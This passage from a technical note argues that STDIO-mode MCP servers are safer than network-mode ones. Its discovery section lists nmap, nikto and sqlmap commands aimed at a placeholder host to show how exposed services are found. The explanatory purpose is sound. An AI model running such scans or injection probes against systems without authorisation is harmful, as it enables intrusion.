- Connection flooding (DoS)
- Sequence number attacks
- Port exhaustion

# Layer 3 (Network):
- IP address spoofing
- Routing table attacks
- Man-in-the-middle attacks
- Network reconnaissance

# Layer 2 (Data Link):
- ARP cache poisoning
- MAC address spoofing
- Switch flooding attacks

# Layer 1 (Physical):
- Network cable tapping
- WiFi interception
- Network infrastructure attacks
```

#### STDIO Mode - Zero Network Attack Surface

```bash
# Operating System Level:
✅ Process isolation prevents external access
✅ Pipe permissions enforced by kernel
✅ No network protocols involved
✅ Cannot be discovered by network scanning
✅ Automatic resource cleanup on parent exit

# The only attack vector:
- Compromise the parent process (Claude Code)
- But this doesn't create NEW attack surface
- Parent process security is already critical
```

### Network Discovery and Scanning

#### How Network Mode Can Be Discovered

```bash
# Port scanning reveals network services
nmap -p 1-65535 target-ip
# Output shows: 3000/tcp open

# Service fingerprinting
nmap -sV -p 3000 target-ip
# May reveal: "Node.js Express framework"

# HTTP service enumeration
curl -v http://target-ip:3000
# Reveals endpoints and server information

# Automated vulnerability scanning
nikto -h http://target-ip:3000
sqlmap -u "http://target-ip:3000/execute" --data="command=test"
```

#### STDIO Mode Is Invisible to Network Tools
```bash
# Port scanning shows nothing
nmap -p 1-65535 target-ip
# No additional open ports from MCP server

# Process scanning (requires local access)
ps aux | grep mcp
# Shows process but no network binding

# Network connection scanning
netstat -tulpn | grep mcp
ss -tulpn | grep mcp
# No network listeners from MCP server
```

### Real-World Analogy

#### Network Mode = Public Payphone

```
Your Network MCP Server ≈ Public payphone on busy street

Characteristics:
❌ Anyone can walk up and use it
❌ No authentication required to access
❌ Accessible 24/7 from public area
❌ Can be discovered by scanning the area
❌ Vulnerable to physical tampering
❌ Conversations can be overheard
❌ Location is publicly known
```

#### STDIO Mode = Private Intercom System

```
Your STDIO MCP Server ≈ Private intercom between two secured rooms

Characteristics:
✅ Only connected rooms can communicate
✅ No external access possible
✅ Cannot be discovered from outside
✅ Automatic disconnection when rooms close
✅ Private channel with no wiring outside the building (private, though not encrypted)
✅ No public presence or discoverability
✅ Dies when building is vacated
```

### Performance Comparison

#### STDIO Mode Performance Benefits

```bash
# Communication path:
Application → System Call → Kernel → Pipes → Target Process

# Advantages:
✅ No network stack overhead
✅ No TCP/IP processing
✅ No network serialization/deserialization
✅ Data passes only through an in-kernel pipe buffer
✅ Kernel-optimized pipe performance
✅ No network latency or jitter
```

#### Network Mode Performance Overhead

```bash
# Communication path:
Application → System Call → Kernel → Network Stack → Network Interface → Physical Network → ... → Target Process

# Disadvantages:
❌ Full network stack processing required
❌ TCP/IP overhead (headers, checksums, etc.)
❌ Network serialization overhead
❌ Potential network latency and jitter
❌ Additional memory copies through network buffers
❌ Network interface driver overhead
```

### Key Architectural Principle

**The fundamental security principle is**:

> **"If communication doesn't need to cross machine boundaries, don't use protocols designed for that purpose."**

This means:
- Use **IPC mechanisms** (pipes, domain sockets) for local communication
- Use **network protocols** only when actually communicating across networks
- **Default to the most restrictive communication mechanism** that meets your needs
- **Network exposure should be explicit and intentional**, never accidental

### Why "Local IPC Suffices" for MCP

MCP (Model Context Protocol) communication typically involves:

1. **Same-machine processes**: Claude Code and MCP server run on same computer
2. **Parent-child relationship**: Claude Code spawns and manages MCP server
3. **Request-response pattern**: Simple command/response communication
4. **No remote access needed**: No legitimate need for network accessibility
5. **Process lifecycle coupling**: MCP server should die when Claude Code exits

All of these requirements are fully served by **local IPC** (specifically STDIO pipes), while **network protocols** add no value in this setup and create significant security risk.

### The Bottom Line

**STDIO mode eliminates network attack surface entirely by operating outside the network stack.** Instead of using protocols designed for internet communication, it uses OS-level process communication that cannot be accessed remotely.
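
The parent-child, request-response, and lifecycle-coupling points listed under "Local IPC Suffices" can be illustrated with a minimal sketch. It does not talk to a real MCP server: `CHILD_SOURCE` is a hypothetical stand-in that echoes one JSON object per line, and `call_child` and the message shape are names invented for this example only.

```python
import json
import subprocess
import sys

# Hypothetical stand-in for an MCP server (NOT the real protocol):
# reads one JSON object per line on stdin, replies on stdout,
# and exits when stdin reaches EOF.
CHILD_SOURCE = r"""
import json, sys
for line in sys.stdin:
    request = json.loads(line)
    reply = {"id": request["id"], "result": {"echo": request["method"]}}
    sys.stdout.write(json.dumps(reply) + "\n")
    sys.stdout.flush()
"""


def call_child(method, request_id=1):
    """Spawn the child, send one request over its stdin pipe,
    and return (reply, exit_code)."""
    child = subprocess.Popen(
        [sys.executable, "-c", CHILD_SOURCE],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        text=True,
    )
    # Request-response over pipes: no port is opened at any point.
    child.stdin.write(json.dumps({"id": request_id, "method": method}) + "\n")
    child.stdin.flush()
    reply = json.loads(child.stdout.readline())

    # Lifecycle coupling: closing the parent's end of the pipe gives the
    # child EOF on stdin, so its read loop ends and the process exits.
    child.stdin.close()
    exit_code = child.wait(timeout=10)
    child.stdout.close()
    return reply, exit_code


if __name__ == "__main__":
    reply, exit_code = call_child("get_status")
    print("reply:", reply)
    print("child exit code:", exit_code)
```

While the child is running, a listener check such as `ss -tulpn` would be expected to show nothing for it, since the only channel is the pair of pipes held by the parent.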
The absence of any network listener is why the security guidance consistently recommends STDIO mode: **it's not just "more secure"; it rules out entire categories of remote attacks by construction.**

## Key Takeaways

### Semtools
- Powerful combination of AI-powered document parsing and semantic search
- Requires proper API configuration but provides excellent text extraction
- Semantic search finds contextually relevant content beyond keyword matching
- Outputs are well-structured and preserve document formatting

### MCP Security
- Terminal access should be avoided or heavily restricted
- Multiple layers of security are essential
- STDIO mode is safer than network mode
- Always apply principle of least privilege
- Structured APIs are preferable to raw command execution

## Resources

- **LlamaParse API**: https://api.cloud.llamaindex.ai
- **Semtools**: Installed via `cargo install semtools`
- **MCP Documentation**: Model Context Protocol specifications
- **Security Best Practices**: Container isolation, permission controls, audit logging

---

*Document created: 2025-09-06*
*Tools tested: semtools v1.2.1, Rust 1.89.0*